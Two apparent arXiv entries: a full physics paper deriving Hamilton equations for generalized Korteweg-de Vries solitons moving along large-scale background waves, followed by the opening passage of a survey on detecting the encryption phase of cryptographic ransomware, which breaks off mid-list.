We consider propagation of solitons along large scale background waves in the generalized Korteweg-de Vries (gKdV) equation theory when the width of the soliton is mach smaller than the characteristic size of the background wave. Due to this difference in scales, the soliton's motion does not affect the dispersionless evolution of the background wave. We obtained the Hamilton equations for soliton's motion and derived simple relationships which express the soliton's velocity in terms of a local value of the background wave. Solitons' paths obtained by integration of these relationships agree very well with the exact numerical solutions of the gKdV equation.
A. M. Kamchatnov, D. V. Shaykin
2023-07-23T13:18:18Z
http://arxiv.org/abs/2307.12321v2
# Propagation of generalized Kortweg-de Vries solitons along large scale waves ###### Abstract We consider propagation of solitons along large scale background waves in the generalized Korteweg-de Vries (gKdV) equation theory when the width of the soliton is mach smaller than the characteristic size of the background wave. Due to this difference in scales, the soliton's motion does not affect the dispersionless evolution of the background wave. We obtained the Hamilton equations for soliton's motion and derived simple relationships which express the soliton's velocity in terms of a local value of the background wave. Solitons' paths obtained by integration of these relationships agree very well with the exact numerical solutions of the gKdV equation. pacs: 05.45.Yv, 47.35.Fg ## I Introduction Perturbation theory for solitons has a long history and a number of publications is devoted to different approaches to it which span from simple variational estimates to rigorous mathematical investigations based on the inverse scattering transform method (see, e.g., review articles [1; 2] and references therein). In spite of that, there still exist some specific situations where the developed so far methods are either insufficient of too complicated for practical use and simpler approaches are needed. One such a situation refers to propagation of solitons along a large scale background wave \(u=\overline{u}(x,t)\), where \(\overline{u}(x,t)\) obeys in the simplest case of unidirectional propagation to the Hopf-like equation \[\overline{u}_{t}+V_{0}(\overline{u})\overline{u}_{x}=0. \tag{1}\] If we denote a characteristic width of a soliton as \(\sim\kappa^{-1}\), then it is assumed that \(\overline{u}(x,t)\) changes considerably at distances about \(l\) much greater than \(\sim\kappa^{-1}\), so that \((\kappa l)^{-1}\) is a small parameter of the theory. At the same time Eq. (1) is just a dispersionless approximation of the nonlinear wave equation under consideration for unidirectional wave propagation. It is supposed that soliton's propagation does not influence on evolution of the background wave, so this equation does not contain any perturbation terms. This scheme corresponds to the generally accepted qualitative picture according to which the soliton's propagation through a non-uniform and varying with time background can be treated as motion of a classical particle under action of external time-dependent field. Consequently, the first task is to derive equations for soliton's motion along the evolving background wave \(u=\overline{u}(x,t)\). In fact, this problem was solved for Korteweg-de Vries (KdV) solitons in Refs. [3; 4] (see also [5; 6]), but this rigorous approach was quite involved mathematically and was not, apparently, widely used in physical literature. Recently this problem was reconsidered in Ref. [7] for propagation of KdV solitons along rarefaction waves by different methods including the Whitham theory of modulations, and this approach was extended to the problem of propagation of KdV solitons along dispersive shock waves (DSWs). Application of the Whitham modulation theory to this type of problems seems very natural since propagation of the soliton edge of a DSW reduces exactly to the motion of the leading soliton along the background dispersionless wave. For example, this approach easily reproduces equations of motion [8] in Bose-Einstein condensate in case of absence of external perturbations (see Ref. [9]). In this paper we combine some ideas developed earlier in the Whitham modulation theory with elementary results of the perturbation theory and reproduce very simply the Hamilton equations of Refs. [3; 4] for soliton's motion. These equations can be integrated to give a useful relationship \[\kappa=\kappa(\overline{u}) \tag{2}\] between the soliton's inverse half-width \(\kappa\) and the background wave amplitude \(\overline{u}\). Since soliton's velocity \(V\) can be expressed in terms of the dispersion relation \(\omega=\omega(k,\overline{u})\) for linear waves with wave number \(k\) propagating along the constant background \(\overline{u}\) by the Stokes formula [10] (see also [11] and references therein) \[V=\frac{\omega(i\kappa,\overline{u})}{i\kappa}, \tag{3}\] then substitution of Eq. (2) gives the equation \[\frac{dx}{dt}=V(\overline{u}(x,t)) \tag{4}\] for soliton's path \(x=x(t)\) which can be easily integrated. The relationship (2) can be treated as an analytical continuation of the relationship between the carrier wave number \(k\) of a short-wavelength wave packet and the background amplitude \(\overline{u}\) which follows from the Hamilton theory of propagation of such packets [12] as well as from the Whitham theory for propagation of small-amplitude edges of dispersive shock waves [13]. This observation allows us to extend the theory to the generalized KdV equation and this is the main task of the present article. Our analytical results are confirmed by exact numerical solutions of particular problems of propagation of solitons along large-scale background waves. ## II Motion of KdV soliton along a background wave The KdV equation \[u_{t}+6uu_{x}+u_{xxx}=0 \tag{5}\] describes evolution of the whole wave structure \[u(x,t)=\overline{u}(x,t)+u_{s}(x,t) \tag{6}\] which consists of the background large-scale wave \(\overline{u}(x,t)\) obeying in our approximation to the Hopf equation \[\overline{u}_{t}+6\overline{u}\,\overline{u}_{x}=0 \tag{7}\] and the soliton \[u_{s}(x,t)=\frac{\kappa^{2}}{2}\cdot\frac{1}{\cosh^{2}[\kappa(x-x_{s}(t))/2]}, \tag{8}\] where \(x_{s}(t)\) denotes the instant position of the soliton and \(\kappa=\kappa(t)\) is its time-dependent inverse half-width. Our first task is to derive the Hamilton equations for the particle-like motion of solitons. To this end, we notice that the dispersion relation for linear waves propagating along constant background \(u=\overline{u}=\text{const}\) reads \[\omega(k,\overline{u})=6\overline{u}k-k^{3}. \tag{9}\] Then, according to the Stokes rule (3), the soliton's velocity is given by \[\frac{dx}{dt}=\frac{\omega(i\kappa)}{i\kappa}=6\overline{u}(x,t)+\kappa^{2}= \frac{\partial H}{\partial p}, \tag{10}\] where we assume that the background \(\overline{u}=\overline{u}(x,t)\) has the value corresponding to the position \(x\) of the soliton at the instant \(t\). We expressed this velocity in Eq. (10) in Hamiltonian form where the Hamiltonian \(H=H(x,p)\) and the canonical momentum are to be determined. The inverse half-width \(\kappa\) must be some function of \(p\). We write this dependence in the form \(\kappa^{2}=f(p)\), so integration of Eq. (10) gives \[H=6\overline{u}p+\int f(p)dp. \tag{11}\] To find \(f(p)\), we need one more equation and, following Ref. [7], we get it from the first non-trivial conservation law for solitons. Substitution of Eq. (6) into (5) gives \[u_{s,t}+6(\overline{u}u_{s})_{x}+6u_{s}u_{s,x}+u_{s,xxx}=-F[\overline{u}(x,t)], \tag{12}\] where \[F[\overline{u}(x,t)]=\overline{u}_{t}+6\overline{u}\,\overline{u}_{x}+ \overline{u}_{xxx}. \tag{13}\] We assume that \(\overline{u}(x,t)\) is a smooth solution of the Hopf equation (7), so the dispersion term in Eq. (13) can be neglected and we can take \(F=0\). Then an easy calculation with the use of several integrations by parts yields \[\begin{split}&\frac{d}{dt}\int_{-\infty}^{\infty}u_{s}^{2}dx=-12 \int_{-\infty}^{\infty}u_{s}(\overline{u}u_{s})_{x}dx\\ &=-6\int_{-\infty}^{\infty}\overline{u}_{x}u_{s}^{2}dx\approx-6 \overline{u}_{x}(x,t)\int_{-\infty}^{\infty}u_{s}^{2}dx,\end{split} \tag{14}\] where we assume that since the distribution (8) has a form of a narrow peak, the smooth function \(\overline{u}_{x}\) can be replaced with good enough accuracy by its value at the soliton's position \(x\) and the moment \(t\). With the use of Eq. (8) we find at once that \[\int_{-\infty}^{\infty}u_{s}^{2}dx=\frac{2}{3}\kappa^{3}, \tag{15}\] so Eq. (14) transforms to the needed equation \[\frac{d\kappa^{2}}{dt}=-4\overline{u}_{x}\kappa^{2}. \tag{16}\] Now, substitution of Eqs. (11) and (16) into the Hamilton equation \[\frac{dp}{dt}=-\frac{\partial H}{\partial x}\] gives with account of \(p=p(f)=p(\kappa^{2})\) \[\frac{dp}{df}\cdot\frac{d\kappa^{2}}{dt}=-\frac{dp}{df}\cdot 4\overline{u}_{x}f=- \frac{\partial H}{\partial x}=-6\overline{u}_{x}p,\] and, consequently, \(2dp/p=3df/f\), so \(p=f^{3/2}\) or \(f=p^{2/3}\), where we have chosen the integration constant equal to unity for simplicity of the notation. At last, substitution of the function \(f=p^{2/3}\) into Eq. (11) yields the Hamiltonian in the form \[H=6\overline{u}(x,t)p+\frac{3}{5}p^{5/3}. \tag{17}\] Soliton moves along the background wave \(\overline{u}=\overline{u}(x,t)\) according to the Hamilton equations \[\begin{split}&\frac{dx}{dt}=\frac{\partial H}{\partial p}=6 \overline{u}(x,t)+p^{2/3},\\ &\frac{dp}{dt}=-\frac{\partial H}{\partial x}=-6\overline{u}_{x} (x,t)p.\end{split} \tag{18}\] Equations (17), (18) coincide up to the notation with the equations obtained in Refs. [3; 4; 5] by a different method. We have arrived at the Hamiltonian system (18) which remains Hamiltonian when \(\overline{u}(x,t)\) evolves according to the hydrodynamic equation (7). This means that the Poincare-Cartan integral invariant [14; 15] \[I_{0}=\oint(p\delta x-H\delta t) \tag{19}\] is preserved by the hydrodynamic flow (7). As was shown in Ref. [16], this implies that there exists the dependence \(p=p(\overline{u})\) determined by the equation \[\frac{dp}{d\overline{u}}=\frac{\partial H/\partial\overline{u}}{V_{0}(\overline {u})-\partial H/\partial p}. \tag{20}\] In our case with \(V_{0}=6\overline{u}\) and \(H\) defined by Eq. (17) this equation takes the form \(p^{-1/3}dp=-6d\overline{u}\), so we get \[p^{2/3}=-4\overline{u}(x,t)+q, \tag{21}\] where \(q\) is an integration constant. According to our definitions above, \(p^{2/3}=f=\kappa^{2}\), so this relation can be written as \[\kappa^{2}=-4\overline{u}(x,t)+q. \tag{22}\] At last, substitution of Eq. (21) into the first Hamilton equation (18) gives a very simple equation for the soliton's path \[\frac{dx}{dt}=2\overline{u}(x,t)+q, \tag{23}\] where it is assumed that \(\overline{u}(x,t)\) is a known solution of Eq. (7) and \(q\) is determined by the initial soliton's velocity. It is worth noticing that Eq. (20) transformed from \(p\) to the variable \(\kappa=p^{1/3}\) coincides with the equation introduced by G. A. El in Ref. [13] for description of motion of the soliton edge of dispersive shock waves generated from evolution of step-like initial discontinuities. Eq. (22) can be obtained in a simpler way with help of the Stokes reasoning [10] based on observation that the exponentially small soliton tails \(u_{s}\propto\exp[\pm\kappa(x-V_{s}t)]\) and the small-amplitude harmonic waves \(\propto\exp[i(kx-\omega t)]\) obey the same linearized equations, so the transformation \(k\mapsto i\kappa\) converts the phase velocity \(V(k)=\omega(k)/k\) into the soliton's velocity (3). From this point of view, the formula (3) for the soliton velocity is just an analytical continuation of the formula \(V(k)=\omega(k)/k\) for the phase velocity from the real \(k\)-axis to its imaginary axis in the complex \(k\)-plane. This idea of analytical continuation can be applied to some other expressions obtained for motion of high-frequency wave packets converting them to relations between the soliton's parameters (see Ref. [16]). For example, motion of a localized wave packet is described by its coordinate \(x=x(t)\) and carrier wave number \(k=k(t)\) which obey the Hamilton equations \[\frac{dx}{dt}=\frac{\partial\omega}{\partial k},\qquad\frac{dk}{dt}=-\frac{ \partial\omega}{\partial x}. \tag{24}\] Again, when such a packet propagates along a background wave which evolves according to Eq. (7), the wave number \(k\) is a function of \(\overline{u}\) determined by the equation [12; 13] \[\frac{dk}{d\overline{u}}=\frac{\partial\omega/\partial\overline{u}}{V_{0}( \overline{u})-\partial\omega/\partial k}, \tag{25}\] which in the KdV equation case (7) and (9) gives at once \[k^{2}=4\overline{u}-q, \tag{26}\] where \(q\) is an integration constant. Analytical continuation of this formula to soliton's region according to the Stokes rule \(k\mapsto i\kappa\) reproduces Eq. (22). The advantage of this method, based on the well-established asymptotic theory of propagation of high-frequency wave packets, is that it does not need derivation of Eqs. (18) or (20). At last we notice that formulas (22) and (26) also follow from the Whitham modulation equations [17; 18] at their soliton and small-amplitude edges, correspondingly. Let us illustrate this theory by an example of propagation of a KdV soliton with the initial value \(\kappa=4\), that is the initial amplitude \(A=\kappa^{2}/2=8\), which starts its motion at the point \(x=0\) at the moment \(t=0\). The background wave has the initial profile \[\overline{u}(x,0)=(x/8)^{2},\qquad x>0. \tag{27}\] Then we obtain from Eq. (7) the profile \[\overline{u}(x,t)=\frac{4}{9t^{2}}\left(\sqrt{1+\frac{3}{8}xt}-1\right)^{2}, \qquad x>0, \tag{28}\] at any moment of time \(t\geq 0\). Since the initial velocity equals to \(q=\kappa^{2}=16\), Eq. (23) takes the form \[\frac{dx}{dt}=\frac{8}{9t^{2}}\left(\sqrt{1+\frac{3}{8}xt}-1\right)^{2}+16 \tag{29}\] and it should be solved with the initial condition \(x(0)=0\). The plot of this solution is shown in Fig. 1(a) by a solid line and dots correspond to soliton's positions obtained from numerical solution of the full KdV equation (5) with the initial profile composed of the background wave (27) and the soliton (8) located at \(x=0\) with \(\kappa=4\). The Figure 1: (a) Soliton’s path \(x(t)\) obtained from solution of Eq. (29) (solid line) and from exact numerical solution of the KdV equation (5). (b) Change of the soliton’s amplitude \(A\) during propagation of the soliton along the background wave (28); solid line corresponds to Eq. (30) and dots to the numerical solution of the KdV equation. solid line in Fig. 1(b) shows the analytical dependence (see Eq. (22)) \[A=\frac{\kappa^{2}}{2}=8-2\overline{u}(x(t),t) \tag{30}\] of the soliton's amplitude on time \(t\) and dots correspond again to numerical values of the amplitude. As we see, our approximate analytical theory agrees very well with the exact numerical solution. ## III Generalized KdV equation Here we shall apply the above approach to the generalized KdV (gKdV) equation \[u_{t}+V_{0}(u)u_{x}+u_{xxx}=0, \tag{31}\] where \(V_{0}(u)\) is a monotonously growing function of \(u\), \(V_{0}(0)=0\). If we look for a soliton solution in the form \(u=u(\xi)\), \(\xi=x-Vt\), when it propagates along a constant background \(u\rightarrow\overline{u}\) as \(|\xi|\rightarrow\infty\), then an easy calculation lead to the equation \[\begin{split} u_{\xi}^{2}=G(u),\quad G(u)=& V(u- \overline{u})^{2}-2\left[\Phi(u)-\Phi(\overline{u})\right]\\ &+2\Phi^{\prime}(\overline{u})(u-\overline{u}),\end{split} \tag{32}\] where \[\Phi(u)=\int_{0}^{u}du^{\prime}\int_{0}^{u^{\prime}}V_{0}(u^{\prime\prime})du^ {\prime\prime}. \tag{33}\] The expression in the right-hand side of Eq. (32) has a double zero at \(u=\overline{u}\). One more zero \(u=u_{m}>\overline{u}\) defines the soliton's amplitude by the equation \[\frac{1}{2}V(u_{m}-\overline{u})^{2}=[\Phi(u_{m})-\Phi(\overline{u})]-\Phi^{ \prime}(\overline{u})(u_{m}-\overline{u}), \tag{34}\] so that \[A=u_{m}-\overline{u}. \tag{35}\] The soliton's profile is determined in implicit form by the quadrature \[\xi=\int_{u}^{u_{m}}\frac{du}{\sqrt{G(u)}}. \tag{36}\] We assume that this solution is stable. For example, in case of \[V_{0}(u)=6u^{\gamma} \tag{37}\] the soliton solution is stable, if \(0<\gamma<4\) (see Ref. [19]). In a particular case of modified KdV (mKdV) equation with \(\gamma=2\) the soliton solution can be written in explicit form \[u(\xi)=\overline{u}+\frac{V-6\overline{u}^{2}}{\sqrt{V-2\overline{u}^{2}}\cosh (\sqrt{V-6\overline{u}^{2}}\xi)+2\overline{u}}. \tag{38}\] Consequently, in this case the inverse half-width \(\kappa\) is related with the soliton's velocity \(V\) by the formula \[\kappa^{2}=V-6\overline{u}^{2} \tag{39}\] and the amplitude is equal to \[A=\frac{V-6\overline{u}^{2}}{\sqrt{V-2\overline{u}^{2}}+2\overline{u}}. \tag{40}\] Now we turn to the problem of propagation of solitons along smooth large scale background waves. In case of the gKdV equation (31) we get the dispersion relation for harmonic waves \[\omega(k,\overline{u})=V_{0}(\overline{u})k-k^{3}. \tag{41}\] It is assumed that the wavelength is much smaller than a characteristic size of the background wave \(\overline{u}\) whose evolution is described by Eq. (1). Now Eq. (25) gives (see [11; 13]) \[k^{2}=\frac{2}{3}V_{0}(\overline{u})-q, \tag{42}\] \(q\) is an integration constant. Analytical continuation of this formula to the soliton region yields the expression for the soliton's inverse half-width \[\kappa^{2}=q-\frac{2}{3}V_{0}(\overline{u}). \tag{43}\] Consequently, the Stokes rule (3) gives the expression for the soliton's velocity \[\frac{dx}{dt}=V=\frac{\omega(i\kappa,\overline{u})}{i\kappa}=V_{0}(\overline{ u})+\kappa^{2}=\frac{1}{3}V_{0}(\overline{u})+q, \tag{44}\] where the integration constant \(q\) is determined by the initial conditions. Integration of this equation with known law \(\overline{u}=\overline{u}(x,t)\) of evolution of the background wave gives the path \(x=x(t)\) of the soliton. In case of the mKdV equation we get \[\frac{dx}{dt}=V=2\overline{u}^{2}(x,t)+q \tag{45}\] and substitution of this expression for \(V\) to Eq. (40) gives the dependence of the amplitude along the soliton's path, \[A(t)=\sqrt{q}-2\overline{u}(x(t),t). \tag{46}\] Of course, this result can also be obtained directly from Eq. (34), which is applicable to the general nonlinearity function \(V_{0}(u)\), with the use of Eqs. (35) and (44). The Hamilton equations for soliton's motion in case of the gKdV equation can be obtained without much difficulty. We denote again \(\kappa^{2}=f(p)\) and integration of the equation \[\frac{dx}{dt}=\frac{\partial H}{\partial p}=V=V_{0}(\overline{u})+\kappa^{2} =V_{0}(\overline{u})+f(p)\] gives \[H=V_{0}(\overline{u})p+\int f(p)dp. \tag{47}\] Differentiation of Eq. (43) along the soliton's path yields \[\frac{d\kappa^{2}}{dt}=-\frac{2}{3}V_{0}^{\prime}(\overline{u})(\overline{u}_{t }+V\overline{u}_{x})=-\frac{2}{3}V_{0}^{\prime}(\overline{u})\overline{u}_{x} \kappa^{2}.\] Then the second Hamilton equation \(dp/dt=-\partial H/\partial x\) gives \[\frac{dp}{df}\cdot\left(-\frac{2}{3}V_{0}^{\prime}(\overline{u})\overline{u}_ {x}f\right)=-V_{0}(\overline{u})\overline{u}_{x}p\] and, hence, \(f(p)=p^{2/3}\), \(p=\kappa^{3}\). Thus, we obtain the Hamiltonian \[H=V_{0}(\overline{u}(x,t))p+\frac{3}{5}p^{5/3} \tag{48}\] and the Hamilton equations \[\frac{dp}{dt}=-V_{0}^{\prime}(\overline{u})\overline{u}_{x}p,\qquad\frac{dx}{ dt}=V_{0}(\overline{u})+p^{2/3}. \tag{49}\] Let us apply the developed theory to the problem of propagation of solitons in case of the nonlinearity function (37) and for the initial background wave distribution \[\overline{u}_{0}(x)=\left\{\begin{array}{ll}a(x/5)^{1/\gamma},&x>0,\\ 0,&x<0.\end{array}\right. \tag{50}\] Then the solution of the Hopf equation (1) reads \[\overline{u}(x,t)=a\left(\frac{x}{t/\tau+5}\right)^{1/\gamma},\quad\tau=\frac {1}{6a^{\gamma}}, \tag{51}\] and \(V_{0}(\overline{u})\) is given by \[V_{0}(\overline{u}(x,t))=\frac{x}{t+5\tau}. \tag{52}\] Let the soliton start its motion at the point \(x=0\) at the moment \(t=t_{0}>0\) with the initial velocity \(v_{0}\). Then Eq. (44) takes the form \[\frac{dx}{dt}=\frac{1}{3}\frac{x}{t+5\tau}+v_{0} \tag{53}\] and it can be easily solved to give \[x(t)=\frac{3}{2}v_{0}(t+5\tau)\left\{1-\left(\frac{t_{0}+5\tau}{t+5\tau} \right)^{2/3}\right\}. \tag{54}\] The soliton's amplitude along the path can be found from Eqs. (34), (35) with \[\Phi(\overline{u})=\frac{6}{(\gamma+1)(\gamma+2)}\overline{u}^{\gamma+2} \tag{55}\] and \(V\) is defined by Eq. (53). These analytical predictions are compared with numerical solutions of Eq. (31) in Fig. 2 and very good agreement is observed. ## IV Conclusion We showed that the KdV soliton dynamics along a large-scale background wave can be reduced to Hamilton equations with the use of elementary perturbation theory argumentation. Preservation of the Hamiltonian structure by the dispersionless flow leads to a simple relationship between the inverse half-width of a moving soliton and a local value of the background wave. This relationship can be interpreted as an analytical continuation of the relationship between the carrier wave number of a wave packet propagating along a large-scale background wave which follows from the well-known optical-mechanical analogy where the packet's dynamics is also treated by the Hamilton methods. This type of reasoning first introduced by Stokes allows one to extend the theory to the generalized KdV equation case and the analytical results are confirmed by comparison with exact numerical solutions. We believe that our approach based on preservation of Hamiltonian dynamics of both high-frequency wave packets and narrow solitons by dispersionless hydrodynamic flow can be applied to other problems of soliton dynamics. Figure 2: Paths \(x(t)\) of the solitons propagating along the background waves (51) for different data sets \((\gamma,a,v_{0},x_{0})\): gray \((2,0.25,40,-20)\), brown \((1.5,0.1,15,-25)\) and green \((0.8,0.005,10,0)\). The circles correspond to the numerical solution of Eq.(31), the solid lines to Eq. (53), and the dashed lines correspond to free motion of the soliton along a zero background. ###### Acknowledgements. This research is funded by the research project FFUU-2021-0003 of the Institute of Spectroscopy of the Russian Academy of Sciences (Section II) and by the RSF grant number 19-72-30028 (Section III).
2306.12008
Cryptographic ransomware encryption detection: Survey
The ransomware threat has loomed over our digital life since 1989. Criminals use this type of cyber attack to lock or encrypt victims' data, often coercing them to pay exorbitant amounts in ransom. The damage ransomware causes ranges from monetary losses paid for ransom at best to endangering human lives. Cryptographic ransomware, where attackers encrypt the victim's data, stands as the predominant ransomware variant. The primary characteristics of these attacks have remained the same since the first ransomware attack. For this reason, we consider this a key factor differentiating ransomware from other cyber attacks, making it vital in tackling the threat of cryptographic ransomware. This paper proposes a cyber kill chain that describes the modern crypto-ransomware attack. The survey focuses on the Encryption phase as described in our proposed cyber kill chain and its detection techniques. We identify three main methods used in detecting encryption-related activities by ransomware, namely API and System calls, I/O monitoring, and file system activities monitoring. Machine learning (ML) is a tool used in all three identified methodologies, and some of the issues within the ML domain related to this survey are also covered as part of their respective methodologies. The survey of selected proposals is conducted through the prism of those three methodologies, showcasing the importance of detecting ransomware during pre-encryption and encryption activities and the windows of opportunity to do so. We also examine commercial crypto-ransomware protection and detection offerings and show the gap between academic research and commercial applications.
Kenan Begovic, Abdulaziz Al-Ali, Qutaibah Malluhi
2023-06-21T04:11:52Z
http://arxiv.org/abs/2306.12008v1
# Cryptographic ransomware encryption detection: Survey ###### Abstract The ransomware threat has loomed over our digital life since 1989. Criminals use this type of cyber attack to lock or encrypt victims' data, often coercing them to pay exorbitant amounts in ransom. The damage ransomware causes ranges from monetary losses paid for ransom at best to endangering human lives. Cryptographic ransomware, where attackers encrypt the victim's data, stands as the predominant ransomware variant. The primary characteristics of these attacks have remained the same since the first ransomware attack. For this reason, we consider this a key factor differentiating ransomware from other cyber attacks, making it vital in tackling the threat of cryptographic ransomware. This paper proposes a cyber kill chain that describes the modern crypto-ransomware attack. The survey focuses on the Encryption phase as described in our proposed cyber kill chain and its detection techniques. We identify three main methods used in detecting encryption-related activities by ransomware, namely API and System calls, I/O monitoring, and file system activities monitoring. Machine learning (ML) is a tool used in all three identified methodologies, and some of the issues within the ML domain related to this survey are also covered as part of their respective methodologies. The survey of selected proposals is conducted through the prism of those three methodologies, showcasing the importance of detecting ransomware during pre-encryption and encryption activities and the windows of opportunity to do so. We also examine commercial crypto-ransomware protection and detection offerings and show the gap between academic research and commercial applications. + Footnote †: 0167-4048/p. 2023 The Author(s). Published by Elsevier Ltd.] ## 1 Introduction The incursion of digital and online lifestyles in almost every segment of our lives has brought multiple consequences related to dependence on integrity and availability of information in business and personal matters. One of those consequences is our inability to live, work or even receive life-dependent services like medical treatment or water and electricity supply if related digital resources and data are unavailable or compromised. Cybercrimes are seeing significant growth across all geographies, with ransomware being the leading type of attack (Singleton et al., 2021). Ransomware is a type of attack where malicious actors utilize multiple tactics and techniques to gain the capability to lock or encrypt a victim's data. This attack usually results in an ultimatum where the victim-user either pays for unlocking or decryption keys or faces losing all their data. Due to the already mentioned dependency on digital lifestyle, data is constantly growing in importance, creating an environment for a very lucative business for ransomware gangs since the first recorded attack in 1989. While crypto-ransomware is a more common type of attack and lock-ransomware is in the decay (Berrueta et al., 2019), the latter is still relevant, especially in the mobile platforms (Su et al., 2018). According to a Fortinet survey, ransomware grew by 1070% across different industry verticals between July 2020 and June 2021 (Fortinet, 2021). Critical services like the health sector, especially in the age of the COVID-19 pandemic, have been particularly vulnerable and targeted--the U.S. Health and Human Services Department has tracked 82 ransomware attacks in the first five months of 2021. The average cost of the incident in the U.S. health sector was around USD1.27 million, even though only USD131,000 was the average cost of the ransomware payment (U.S. Department of Health and Human Services Cybersecurity Program, 2021). The rest of the cost was distributed across lost business costs, including increased customer turnover, lost revenue due to system downtime, and the increasing cost of acquiring new business due to diminished reputation. Depending on the industry and geography, in other sectors worldwide, the ransom ranged between USD7.75 million and USD0.37 million, making the average cost of ransomware incidents in 2021 USD1.85 million (Sophos, 2021). The ransomware threat goes even further, with the Conti ransomware group announcing their support for the Russian invasion of Ukraine at the end of February 2022 and ac tive participation in cyber warfare utilizing their capabilities and the available access to various assets worldwide (Russia-based ransomware group Conti issues warning to Kremlin fees | Reuters). Despite all the reporting and high-profile cases of ransomware attacks, they continue to flourish and grow in sophistication and effectiveness. The reason for this probably lies in the fact that, according to Fortiner's survey in 2021, 96% of companies that were already victims of ransomware gangs responded that they were moderately ready for the ransomware attack, even though 16% of them suffered from three or more attacks (Fortiner, 2021). As shown in Fig. 1, in industries like Professional Services, Government, and Healthcare, the percentage of ransomware attacks as a portion of all cyber attacks is 35%, 33%, and 28%, respectively, making this type of attack by far the most common attack overall (Singleton et al., 2021). Nevertheless, another trend was noticed in Sophos' research on the state of ransomware. The malicious ransomware actors are moving away from generic and automated large-scale attacks to more targeted attacks executed with precision and persistence (Sophos, 2021). A review of the available data on modes of ransomware groups' operation points to apparent similarities with the Advanced Persistent Threat modus operandi. This observation partially explains the increase in the difficulty of detecting and defending against these attacks compared to defending against malware like common viruses, trojans, or worms. In the targeted crypto-ransomware attack, the malicious actor uses various techniques to gain the capability to encrypt the victim's data. Such techniques evolve, becoming more focused (Sophos, 2021) and using precise no-noise attacks on the networks (Wang et al., 2018). Despite the shifting of techniques and some tactics, cryptographic ransomware carries one differentiating characteristic that separates it from malware: the capability and goal of encrypting victims' data so that only malicious actors can decrypt it upon the ransom payment. In this survey, existing proposals of pre-encryption and encryption detection techniques were reviewed to show their importance in countering ransomware and the possibility of being the ultimate solution for eliminating this threat. Detecting and countering crypto-ransomware has long been at the forefront of scholarly research. With the advent of the COVID-19 pandemic, motivation for ransomware attacks increased, and research interest in this topic has grown to an ever-larger extent. Most pre-encryption and encryption detection solutions operate in a host-based environment focusing on file system and kernel activity monitoring. However, some detection solutions focus on network communication inside local target networks and communication with command and control servers. The latter algorithms do not necessarily utilize network information to detect DNS-based indicators of compromise (IOC) but also deep packet inspection to detect cryptographic key delivery and exfiltration. The comprehensive set of algorithms and techniques to detect pre-encryption and encryption varies from simple decoys placement and file integrity monitoring to complex machine learning (ML) models trained on monitoring systems' behavior during encryption and encryption-related operations, such as key generation. The survey also focuses on encryption-related detection in crypto-ransomware, and any further references to ransomware are related to the encryption of victims' data by malicious actors with the purpose of extortion. After introducing the topic of cryptographic ransomware, this paper covers related survey-like works available at the time of writing in the section 1.1 _Related Work_. Further, we propose a cyber kill chain to describe cryptographic ransomware attacks and discuss each of the defined phases in the kill chain, describing the behavior and methodology of attacks. In the survey part of the paper, we review research on the detection of activities related to the Encryption phase as described in the discussion of the proposed cyber kill chain. We also provide a brief survey of commercial solutions and usage of encryption detection outside of the crypto-ransomware use case. ### Related work Several surveys related to ransomware have been published, primarily focusing on defining the characteristics of ransomware attacks. However, there were no previous attempts to build a survey of detection techniques related to encryption as a hallmark of ransomware attacks. Recent literature on ransomware threats is largely focused on three main streams. The first stream revolves around identifying recent ransomware threats based on static and dynamic analysis developed by the scientific community. The second stream aims to classify ransomware threats without necessarily focusing on detection algorithms. Finally, the third stream engages with holistic ap Figure 1: Percentage of attack types per industry (Singleton et al., 2021). proaches to ransomware techniques and tactics. The following will briefly present these studies. With regard to the first stream, Moussaileb et al. (2021), in their survey of ransomware threats to Windows operating systems, have unified all detection techniques based on static and dynamic analysis developed by the scientific community since 2014. This survey treats both crypto and locking ransomware types and, despite the title and general topic of the paper, covers some Android ransomware cases as well. The existing surveys focus on crypto ransomware strictly (Berrueta et al., 2019), noting the difficulty of surveying this novel topic since data from various papers is impossible to compare due to different metrics and approaches to ransomware. Regarding studies focusing on the second stream, in an earlier attempt to survey research on ransomware, Alrimy et al. (2018) provided a comprehensive classification of ransomware attacks but with few details on detection algorithms. Also worth mentioning is a paper by Eze et al. (2018), that attempted a holistic examination of ransomware techniques and tactics in a very general and brief manner. Other survey-like papers focus on the evolution of the ransomware phenomenon (Zavarsky and Lindskog, 2016) or actual empirical data about real-world attacks (Connolly et al., 2020). In their survey of ransomware detection solutions, Herrera Silva et al. (2019) focus on identifying and listing all the detection and prevention parameters identified in the surveyed research, and they consider situational awareness concerning the same. About the third stream, which takes more innovative approaches, more comprehensive surveys (Oz et al., 2022) cover all available varieties of platforms targeted by ransomware and consider the historical context and chronology of ransomware development. Other similar works (Dargaili et al., 2019) take the systematization of ransomware features' taxonomy as a center of their proposal, and, similar to ours, the authors propose a cyber kill chain that attempts to describe and encompass all ransomware behavior observed so far. Also, some proposals focus on certain operating systems like Android (Ameer et al., 2018), Windows (Moussaileb et al., 2021; Reshmi, 2021; Naseer et al., 2020), or methods and tools in detection like a machine and deep learning and big data (Urooj et al., 2022; Bello et al., 2021). Finally, some proposals seek to build benchmarks for researchers who want to introduce more innovative approaches in ransomware detection mechanisms (Maigida et al., 2019). Cryptographic ransomware detection has interested the academic community and the cybersecurity industry. Methodologies and techniques for detection use static and dynamic analysis of components and actions belonging to the cryptographic ransomware lifecycle phases. Some focus on local user machines, user and program activities, and the state of files in memory and file systems. Others look at the network indicators of ransomware presence, ranging from detecting single ransomware based on its signature to complex heuristic techniques and machine learning algorithms looking at multiple stages of the ransomware lifecycle. Digging deeper into the available literature, it is noticeable that only some research papers focus on the issue of encryption in crypto-ransomware. Those usually concentrate on machine learning algorithms (Kok et al., 2020) or methods like frequency of encryption estimation (Mulders, 2017). Furthermore, approaches focusing on the state of files in the file system (Jethva et al., 2020; Jung and Won, 2018), monitoring of the hardware performance (Dimov and Tsonev, 2020), and even the energy consumption (Azmoodeh et al., 2018) show promising results in detecting encryption. This paper aims to survey contributions to the research of _encryption detection_ in ransomware and techniques valuable for detecting the ransomware Encryption phase. The analysis does not employ first-hand information like in some other more general surveys on the crypto-ransomware (Berrueta et al., 2019). Instead, it focuses on results in other scientific and industry-based propositions with a strong focus on encryption detection. The outline of the contributions of this paper relative to the recent ransomware surveys can be summarized as follows: * [leftmargin=*,noitemsep,topsep=0pt,parseparse=0pt] * Compared to other survey papers in the field, this survey provides a deeper dive into the detection of encryption by compartmentalizing the detection of encryption techniques and treating them as independent cases, even if they are part of a hybrid solution. * We identify a widening gap between richly-diverse academic literature on the detection of encryption techniques on the one hand and commercial implementations in market-leading solutions on the other. * We provide an overview of some of the key challenges and, in our view, 